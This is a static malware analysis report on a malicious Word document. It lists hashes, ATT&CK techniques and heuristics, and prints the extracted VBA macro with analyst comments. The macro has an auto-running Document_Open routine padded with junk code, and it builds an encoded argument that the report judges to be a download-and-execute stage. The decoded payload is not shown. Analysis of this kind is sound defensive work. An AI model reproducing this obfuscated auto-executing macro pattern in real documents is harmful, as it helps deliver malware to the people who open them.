Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a5014d9efcbaa5…

MALICIOUS

Office (OLE)

127.9 KB Created: 2018-10-04 07:52:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 7947a6a5ad4bd3ee74762cfc210a3dce SHA-1: d159c26f8c4f3bb3166c6e2949efb1e17020419e SHA-256: 42a5014d9efcbaa57da699dd427dd9c8292b56fef0d480afe303ffd59f0b163e
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high-slack anomaly and a detected VBA macro. The Document_Open macro is present and appears to be obfuscated: its one substantive statement is a call whose argument is built by concatenating the return values of several helper functions, each of which assembles an encoded string from literal fragments. This suggests the macro is intended to download and execute a secondary payload. The presence of the auto-executing Document_Open macro and the nature of the obfuscated script strongly indicate a malicious intent, likely delivered as a spearphishing attachment.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 130,944 bytes but its declared streams total only 36,368 bytes — 94,576 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro present; VBA runs it automatically when the document is opened, so any payload it carries executes without further user action.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — an OOXML schema namespace identifier, commonly present in benign documents; not a download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19717 bytes
SHA-256: 6beb4c2e7f06616c03c48a98d1ed37edff4ccd8f69b09d0ebca1d023cbf1bc0f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KuXuJEF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: VBA runs Document_Open when the document is opened,
' so everything below runs without any further user action.
'
' Analyst notes (based only on the visible listing):
'  - Every If block in this procedure compares names (BcPuN, dwHpz, SGXzbK, ...)
'    that are never assigned anywhere in the visible listing; the bodies only
'    declare arrays that are never used and add more never-assigned names
'    together. These read as filler inserted to pad the macro and defeat
'    signature matching — presumably dead code, to be confirmed by dynamic analysis.
'  - The single statement that does real work is the call after the fifth
'    If block (see the comment there).
Private Sub Document_Open()
   If BcPuN > dwHpz Then

Dim ECRQmh()
Xrdnj = PSqja + IGmNZC
TzjRBz = GCCscL + ALPXo + lzGmRj + oUSprN

End If
   If SGXzbK < 2 Then

Dim EXltDz()
RJfYM = IdQwkc + UatZf + cvcDo + cuiEkK
LGDHJ = QVrop + NwFWdd + NwUNo + rkkzd

End If
   If lSRzRT <> 15 Then

Dim NOklGn()
bpWXAa = wUqtO + SbjYN + JpuhH + KtwzM

End If
   If FmAFlV < 2 Then

Dim rjKITb()
jbmPm = ibWDVI + URpkd

End If
   If naboj Eqv MQzEO Then

Dim IvWpkT()
VswzVH = mkNBO + DnXpv

End If
' The only non-filler statement: calls tpRkmjuLBGzoTk (its definition is not in
' the visible listing) with one argument assembled by concatenating the return
' values of eleven helper functions. Two of them, cGCtDaYv and wWCSmJQi, are
' defined further down and each builds a string out of literal fragments, so
' the argument is most likely an encoded command or URL for the callee to
' decode. The report summary assesses this as the download-and-execute stage —
' TODO confirm by recovering the decoded argument.
tpRkmjuLBGzoTk (cGCtDaYv + wWCSmJQi + BalUrjUlt + lBPGOtzciHH + vIPZOKj + GbNuIL + vCiSJBQovwi + NlGhZSnvpTH + iCZVt + lqpNRMj + zHuKsTqa)
' Remaining If blocks: same filler pattern as above (never-assigned operands,
' unused array declarations, no effect on the call already made).
   If jLBPG <> awHRj Then

Dim DlwDop()
ULRBq = ERusc + OOtLQ + YGXuw + CzZmh

End If
   If EMSEkV >= cWkzP Then

Dim hbsnd()
LVozQ = pdbFDB + hLotj
TwCQB = ijOZQ + RlzROP

End If
   If UwqDz <= KLwCF Then

Dim FfBVaJ()
hrPifa = NwssR + TdIRXK
sGzcER = sYBcz + GsXEPL

End If
   If aQcCwp > cUXht Then

Dim TLkCHm()
vcNoN = UwLThO + TZSInt

End If
End Sub


Attribute VB_Name = "KuskWSj"
' Helper called from Document_Open as the first piece of the argument passed to
' tpRkmjuLBGzoTk. It returns a single string built from five fragments
' (NVjlVPFtOC, LFQllztO, TiGpLXhAA, anEPiL, iWrUHKwwn), each of which is itself
' a concatenation of short literals. The literals are not readable text and the
' character `[` recurs throughout them — presumably a separator or padding that a
' decoder elsewhere strips; the decoder is not in the visible listing, so this is
' an inference to confirm.
' The If blocks interleaved between the string assignments follow the same
' filler pattern as Document_Open: they compare names that are never assigned in
' the visible listing and declare arrays that are never used, and they do not
' touch any of the five fragments.
Function cGCtDaYv()
' Fragment 1 of 5. Note `""""` is a VBA string literal containing one double-quote.
NVjlVPFtOC = "`ja ,S[7[L,@ [p[b[" + "q [5[T:[Y[M`[ [0[^" + "s[ [Y[2O[ [g" + "[a[y[ [/[ " + "@[ [0[f[D " + "[GO%[ [h[D" + """" + "[ [q[w[z["
If ovYlr Xor EMZiiw Then

Dim LzrPL()
UjsNu = FqYmXW + MvXLr

End If
   If vuJOKE Or KcfBA Then

Dim tfiKD()
GYVlhc = YjAjni + KVSdz + NbBku + WnQmp
dHhDZJ = lYjYJw + XhzYNE

End If
   If sVXZs > khLFzi Then

Dim BYVVNH()
QMmNVR = LMZYXv + SXphi

End If
   If ItSoUA <= 14 Then

Dim iDtvDL()
zowii = mtfZCM + jcolz + SBbODs + KbnfrU
tNHbd = dFPOs + IiwBOI

End If
' Fragments 2, 3 and 4 of 5.
LFQllztO = " [U[/[-[ [9[y" + "[G[ [0[J[q[ s[]k" + "[ [ " + """" + "[)[ [G[t[i[ [d" + "[:[u[ k[][I[ " + "[Z[.[<[z[v[.["
TiGpLXhAA = "G[z[q[fO[xs[.[I" + "[e[R[9[/`[E[y[6[q[e" + "[R[i[^[7O[t`[][6[F" + "[z[$[\[![8k[IS[h[L[z"
anEPiL = "[=[^StK[bB[E[" + "Xo[2[/[P[_[(@[.8[r[b" + "[.[c[T[y[F[E[" + "?P[Rk[([m[z!I[-[C[ [" + "]s[\[j[V[{[r[b[c[t[W" + "[qA@[J[F[ [N@"
If fXkrJ And wHwLA Then

Dim WmHvJ()
NnhDr = CAoprY + TluCfp

End If
   If fZYbw < hAvqdE Then

Dim zFfcf()
oJRJQY = jYbjbF + jiNJbt
UztzOT = WfOazs + INQHDX

End If
' Fragment 5 of 5, then the return value: all five fragments joined in order.
iWrUHKwwn = "*[D[#[n[b0[/[l" + "[h[/Ko[l[G%[" + "Ps[h&[^k[m["
cGCtDaYv = NVjlVPFtOC + LFQllztO + TiGpLXhAA + anEPiL + iWrUHKwwn
' Filler after the return value has been set; no further effect on the result.
   If LPXNU < 12 Then

Dim rWAmD()
KXJBE = KtMJbM + aUzBY + iLbik + FMGnsZ
pJwpG = wiEPL + nKAtu

End If
   If cRZIi Xor ZKwhDF Then

Dim kOXEc()
rvaqZv = jwhFS + uXzvQ
PAjwz = AKrRZm + RQCZCa

End If
   If SJddt > rLwmS Then

Dim DMiKz()
uZlYOW = JBvrwv + QnwqD

End If
End Function
Function wWCSmJQi()
If JzuiGf < Flrabj Then

Dim buvGij()
vTwrw = PPoHfU + QmdjQ + RvKzX + oqMCv

End If
   If WVNfwn >= ocpzk Then

Dim GVKpQL()
TSRlUa = JADNs + vwqCH
wHaoGM = cNTjW + jHQEDb

End If
iOuqwjkP = "0[DF[l[rQ[8[X['@&[UY" + "v[cK[Z[D[E[f[t" + "[:k[U[ v[!SZO[" + " [Cd[([)[E[a[3[H[a["
If wnZbF = zIiHij Then

Dim isdKZ()
zKqUj = ICitmb + KhJnPi + ndEoY + CUZYat
FYEHT = AwYUOs + mZhYFO + SRTFCv + ZndGTt

End If
   If SsHbb And VwFjQU Then

Dim SiGSz()
nTLSl = zcKauA + HdROi

End If
   If lcBUWi > PJqvs Then

Dim dnASL()
knFwF = AaIvO + zHvnFX + rBHCKP + DpwAc
HfoDjd = wVECTu + wkGpid + TMckui + ULdISb

End If
woMOUDNi = "f[Y[t[D[j[z[g[v[m[>" + "[![;[u[*%[3[" + "([g[b[9[)[#[i/[r[5"
If zPXBiN <= 19 Then

Dim BcWpTV()
zHaVjd = LWLiz + jAUYL + MpEoQH + JaiDEh
HdKoMa = jmsMT + AIBIwd + JJvSJ + wTmcT

End If
zoXURFN = "[fk[P[.[C[l[X" + "[_[a[R[P[?[^[" + "x[ [jl[f[{[M[i.[G["
If TpCWcu Or DRJZJV Then

Dim nsBOj()
MhzGEM = raScFF + ASLEd
vzlbNs = hmQuB + LSlqv + QSCdw + UEPTUj

End If
   If hDwjEl Eqv wAXzLz Then

Dim tzkTd()
hmNdQ = CObETX + TuUlw + bUWjYi + DiCBp

End If
   If BoNwYt Eqv tvFJX Then

Dim ntmPcQ()
NQsWmu = oCNRkz + QXF
... (truncated)